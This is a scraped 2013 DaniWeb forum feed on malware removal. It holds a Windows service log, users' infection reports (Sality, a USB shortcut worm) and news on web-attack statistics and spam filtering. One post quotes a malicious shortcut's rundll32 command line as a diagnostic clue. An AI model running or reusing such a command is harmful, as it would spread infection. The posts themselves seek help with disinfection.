O23 - Service: Futuremark SystemInfo Service - Futuremark Corporation - C:\Program Files\Common Files\Futuremark Shared\Futuremark SystemInfo\FMSISvc.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: IPS Core Service (IPSSVC) - Lenovo Group Limited - C:\WINDOWS\system32\IPSSVC.EXE
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Oracle Corporation - C:\Program Files\Java\jre7\bin\jqs.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.0.207\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: Pure Networks Platform Service (nmservice) - Cisco Systems, Inc. - C:\Program Files\Common Files\Pure Networks Shared\Platform\nmsrvc.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Internet Pass-Through Service (PassThru Service) - Unknown owner - C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
O23 - Service: IBM PSA Access Driver Control (PsaSrv) - Unknown owner - C:\WINDOWS\system32\PsaSrv.exe
O23 - Service: Roxio UPnP Renderer 9 - Sonic Solutions - C:\Program Files\Roxio\Digital Home 9\RoxioUPnPRenderer9.exe
O23 - Service: Roxio Upnp Server 9 - Sonic Solutions - C:\Program Files\Roxio\Digital Home 9\RoxioUpnpService9.exe
O23 - Service: LiveShare P2P Server 9 (RoxLiveShare9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxLiveShare9.exe
O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
O23 - Service: Roxio Hard Drive Watcher 9 (RoxWatch9) - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exe
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files\Skype\Updater\Updater.exe
O23 - Service: ThinkVantage Registry Monitor Service - Unknown owner - C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
O23 - Service: TomTomHOMEService - TomTom - C:\Program Files\TomTom HOME 2\TomTomHOMEService.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
O23 - Service: Cisco AnyConnect Secure Mobility Agent (vpnagent) - Cisco Systems, Inc. - C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
O23 - Service: vToolbarUpdater14.2.0 - Unknown owner - C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\14.2.0\ToolbarUpdater.exe
O23 - Service: webcamXP Service (wxpSvc) - Unknown owner - C:\Program Files\wLite\wService.exe

--
End of file - 18866 bytes
]]> Viruses, Spyware and other Nasties Iggystooge http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/453606/cant-delete-hijacking-virus Facing some problem http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/453466/facing-some-problem Sat, 27 Apr 2013 20:29:16 +0000 hi!guys I am facing problem with my avast free antivirus .i think using avast my computer show blue screen problem and many time go to hang.I am sufering with this problem can any one help or tell me the alternative of the avast hi!guys

I am facing problem with my avast free antivirus .i think using avast my computer show blue screen problem and many time go to hang.I am sufering with this problem can any one help or tell me the alternative of the avast

]]> Viruses, Spyware and other Nasties Helper guy http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/453466/facing-some-problem Cyber-attack 'superfecta' statistics released http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453172/cyber-attack-superfecta-statistics-released Wed, 24 Apr 2013 06:45:03 +0000 You may be wondering what a superfecta actually is, and the answer is: the most dangerous and serious threat to business. To clarify, the superfecta as defined by secure cloud hosting outfit FireHost is a group of four attack vectors that comprises of Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS), ... You may be wondering what a superfecta actually is, and the answer is: the most dangerous and serious threat to business. To clarify, the superfecta as defined by secure cloud hosting outfit FireHost is a group of four attack vectors that comprises of Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS), SQL Injection and Directory Traversal.

Cross-Site Request Forgery (CSRF) is an attack mode that forces the end user to execute an unwanted action on a web application in which they are currently authenticated. Cross-Site Scripting (XSS) involves the insertion of malicious code into webpages in order to manipulate website visitors. SQL Injection, as everyone surely knows by now, involves entering malicious commands into URLs and text fields on websites that happen to be vulnerable, usually in an attempt to steal the contents of databases storing valuable data such as credit card details or usernames and passwords. And finally, Directory Traversal (also known as a Path Traversal attack) aims to access files and directories that are stored outside the web root folder.

At the InfoSecurity Europe show yesterday, Firehost revealed its 2013 web application attack statistics for the first quarter of the year which detailed this superfecta as blocked by the firewalls protecting its servers in both Europe and the United States during the period covering January to March 2013.

1252697d8d1433fa21e60d64fe8e46de The volume of Cross-Site Request Forgery (CSRF) attacks was up by an astonishing 132% by the end of the quarter, compared to the same period during 2012. The second most significant increase in frequency was seen in SQL injections which rose by 87%. Overall, however, Cross-Site Scripting (XSS) was the most prevalent Superfecta attack type during the period monitored, with more than 1,200,000 attacks being blocked in total.

"The Superfecta represents the most dangerous type of cyberattack traffic, but these are by no means advanced or difficult attacks for cybercriminals to launch" says Chris Hinkley, Senior Security Engineer at FireHost who continues "for example, cross-site request forgery attacks and cross site scripting attacks are extremely automated and require very little knowledge to implement. It only makes sense that CSRF attacks would increase due to more automated attacks in the arsenals of cybercriminals. SQL Injection attacks represent a smaller portion of the attack traffic we block for our customers, as these attacks require more expertise, but when they're successful, they are very effective. Many will remember or have even been affected by successful SQL Injection attacks on a number of global brands over the past few years. What these numbers really say is malicious web traffic is very diverse and businesses should ensure that they are doing as much as possible to mitigate it."

]]> Viruses, Spyware and other Nasties happygeek http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/453172/cyber-attack-superfecta-statistics-released Unknown Computer Nasties http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/451957/unknown-computer-nasties Mon, 08 Apr 2013 15:16:06 +0000 Guys, good day to everyone. I am trying to solve a computer problem (which I think is very interesting case of a computer nasty) from my sister's and her friends' computer. And also I want to share my discoveries and everything what I have found, and some queries. Here's the ... Guys, good day to everyone.

I am trying to solve a computer problem (which I think is very interesting case of a computer nasty) from my sister's and her friends' computer. And also I want to share my discoveries and everything what I have found, and some queries.

Here's the scenario:

One day, my sister apporached me if i can fix an "unknown virus" which affected their computers.
I tried to figure it out, checked their computers, and found interesting things:

  1. In every directory I explore (Their "D:\Documents" folder, for example), I tried to see if any hidden files are present (random-named files that is characteristic of a virus infection). But the folder options keeps on reverting to Windows-default selected options. (Don't show hidden files, Hide protected system files, Hide extensions on common file names. Those circles are selected.)

  2. I checked their Flash Drives (At my computer) and discovered that no autorun.inf is present. But these things I am investigating:

    1. A Shortcut link to their flash drive.
      I investigated these thing, and showed as a gussied-up Windows Explorer Icon, like these:
      Location: rundll32 (C:\Windows\System32)
      And I viewed the file properties. Here's the target:
      C:\Windows\System32\rundll32.exe ~$WBEHAX.NFC,crys xfnveaiqzhpygoxfn ygoxfnveaiqt
      I think there's something nasty here. Looks like a shorcut vulnerability.

    2. As shown on the Shortcut target above, there's the 3KB-sized file ~$WBEHAX.NFC file i found on the flash drive. (Different case on their friends' flash drives: "~$WHMCAT.FAT", and other files identical to that files.)

    3. At some friends' flash drives, A random-named .dll file was found.
      Not only that, in each of the folders, there is an .exe file named as the same as to where directory they are placed. For example, in "{Flash Drive}:\documents" (F:\Documents) folder, there is a "documents.exe" file. Same as to other directories in their flash drives. Avira flagged those applications as a trojan. (TR/Generic)

    4. Two legal-looking Windows files: Thumbs.db and Desktop.ini.
      I inspected the "thumbs.db" file, contained random characters. Looks legal.
      But the "Desktop.ini" also contained random characters. I began to doubt, because I know that is not the correct format of a "desktop.ini" file. The file size is also large for a legal "desktop.ini". I can't remember exactly, but the size is in three digits, in KB.

  3. I opened the suspicious shortcut link, on my computer. Some little bit suspicious things happened.
    First, I checked my Task manager, and have seen some legal-named applicaton "TrustedInstaller.exe", but is located at "C:\temp", not on the typical System32 folder.
    Second, I have seen some run32dll.exe instances, related to the link above.
    Third, it opens up browser windows (three windows), directing to some suspicious-looking Web links.
    Finally, it created some shortcuts on some of my folders on C:\, the same as redirecting to run32dll.exe.

Luckily, my computer which i was testing this, is locked with a special drive-locking application that refreshes the whole computer at each restart. I become a little-bit, panicked. Restarted my PC.

Anyways, their PCs use Windows XP SP3. And I doubt, their PC's are not patched correctly. Antivirus outdated.

Guys share to me what can be the solutions here to identify what kind of computer nasty inflicted their PCs, and steps to remove it. It would be a great help to me and my friends' computer if we all together can figure out what's going on there. Thank you guys.

Current status: Still figuring it out. I had seen some clues: W32/Conficker, W32/Sality, Windows Shell Vulnerabilities.

]]> Viruses, Spyware and other Nasties CityThrille http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/451957/unknown-computer-nasties My Win. XP has a virus that doesn't allow installing, I want to format it http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/451805/my-win.-xp-has-a-virus-that-doesnt-allow-installing-i-want-to-format-it Sat, 06 Apr 2013 03:55:24 +0000 Does the repair/recovery disc for Windows xp need any sort of installing before I can format my hard drive with it? My computer has a virus that doesn't allow installing of programs. I want to know before I order it from eBay.. I don't know much about this sorta thing Does the repair/recovery disc for Windows xp need any sort of installing before I can format my hard drive with it? My computer has a virus that doesn't allow installing of programs. I want to know before I order it from eBay.. I don't know much about this sorta thing

]]> Viruses, Spyware and other Nasties VanessaGisel http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/451805/my-win.-xp-has-a-virus-that-doesnt-allow-installing-i-want-to-format-it Spamhaus DDoS attack not to blame for rise in spam http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/451322/spamhaus-ddos-attack-not-to-blame-for-rise-in-spam Sun, 31 Mar 2013 11:20:37 +0000 The media, online and off, has been full of scare stories about the 'biggest Internet attack ever' and how a distributed denial of service (DDoS) campaign aimed against anti-spam outfit Spamhaus peaked at an attack volume of 300 Gbps (the highest ever recorded by those who record such things) was ... The media, online and off, has been full of scare stories about the 'biggest Internet attack ever' and how a distributed denial of service (DDoS) campaign aimed against anti-spam outfit Spamhaus peaked at an attack volume of 300 Gbps (the highest ever recorded by those who record such things) was 'slowing down the global Internet'. DaniWeb didn't join the rush to shout 'the sky is falling' as, frankly, we didn't believe it as there was precious little evidence to be found that the DDoS attack was impacting anyone other than Spamhaus along with it's anti-DDoS protection service CloudFlare and their upstream providers. Sure it was a serious attack, one that could well have implications on the direction such things are heading in, and potentially could be bad news for all of use. However, the Internet did not slow down and for the vast majority of global users there was no noticeable effect at all. The one area that you might think would be impacted is the amount of spam that reaches your mailbox. After all, if one of the main organisations responsible for keeping the lid on spam distribution channels is taken off air then surely we can expect to see spam levels peak. So when a press release arrived following these attacks which proclaimed that spam is twice as likely to be hitting mailboxes than previously, I was concerned. But only for a few moments, as a bit more reading reassured me that it had nothing to do with the Spamhaus attacks at all.

001215393dd751a8dc9da91d5dd0f203

Hear the name 'Virus Bulletin' and you immediately think of anti-virus and anti-malware certification and testing, but the same organization also carries out comprehensive spam filtering reviews. In the latest of these anti-spam comparative reviews, some 17 of the products and services put to the test passed with colours that flew enough to get the coveted 'VBSpam award' but there's a catch: the majority of them did so by catching less spam than they used to. In fact, a lot less spam. Of the 19 anti-spam solutions tested, only a rather worrying three of them managed to improve their spam catch rates with nine seeing the percentage of spam they missed at least double compared with recent test results. Indeed, as a result of the overall test figures, Virus Bulletin now reckons that a spam is almost twice as likely to make it into your inbox on average when compared to the previous batch of tests.

If that wasn't bad enough, it appears that the majority of the products tested also had quite a bit more difficulty in preventing false positives. Only four of them correctly identified all the legitimate email in the test runs. When it came to one of the biggest scourges in the average email inbox, phishing scams, more than half of the filters failed missed "at least 10%" of them in a dedicated feed of pure phishing mail messages.

This downward trend has been spotted before as a result of the VB testing, a very similar statistical drop popped up early in 2012 and continued throughout the first half of the year before the filters caught up with the con men and halted the decline. "Spam has been a relatively good news story in recent years, with spam levels declining while catch rates remained high," VB's Anti-Spam Test Director, Martijn Grooten insists though "in spam filtering, the devil is in the details, and when we look at these details, we see more emails slipping through the maze."

Considering that much of the spam that gets delivered will come complete with malware attachments or links to an exploited web site, the fact that spam catch rates are falling is of concern. Not least as it suggests that the bad guys are keeping ahead of the good guys in terms of tweaking the delivery process in order to avoid the filtering traps. While the anti-spam industry does appear to have a record of catching up with these tricks and tweaks, the fact that it takes them half a year to do so really isn't good enough.

]]> Viruses, Spyware and other Nasties happygeek http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/news/451322/spamhaus-ddos-attack-not-to-blame-for-rise-in-spam PC infected by virus and antivirus isn't able to remove them, Please help!! http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/450869/pc-infected-by-virus-and-antivirus-isnt-able-to-remove-them-please-help Sun, 24 Mar 2013 16:52:34 +0000 Hi Fellows, Actually my PC is infected by virus. I downloaded and updated MBAM and performed quick scan (more then few times) and keep getting "6" detections which seems MBAM is not able to remove them (even after restarting on completion of scan every time). I also tried "CCLEANER" "SUPERSPY ... Hi Fellows,
Actually my PC is infected by virus. I downloaded and updated MBAM and performed quick scan (more then few times) and keep getting "6" detections which seems MBAM is not able to remove them (even after restarting on completion of scan every time).
I also tried "CCLEANER" "SUPERSPY REMOVAL" "MICROSOFT SECURITY ESSENTIALS" but still no luck.

Following are the details of MBAM detections that keeps on coming up ever time I scan the system.

Malware.Packer.Gen (Vendor)........... C:\iodq.exe
Virus.Sality (Vendor)........................... Registry key
Virus.Sality (Vendor)........................... Registry key
PUM.Disabled.SecurityCenter............ Registry Data
PUM.Disabled.SecurityCenter............ Registry Data
PUM.Disabled.SecurityCenter............ Registry Data

Please help out to remove torjan completely from my machine.

[P.S some programs are poping out this error (runtime error r6002 floating point) when I try to execute them]

Thanks,

]]> Viruses, Spyware and other Nasties Its.Obi http://www.daniweb.com/hardware-and-software/microsoft-windows/viruses-spyware-and-other-nasties/threads/450869/pc-infected-by-virus-and-antivirus-isnt-able-to-remove-them-please-help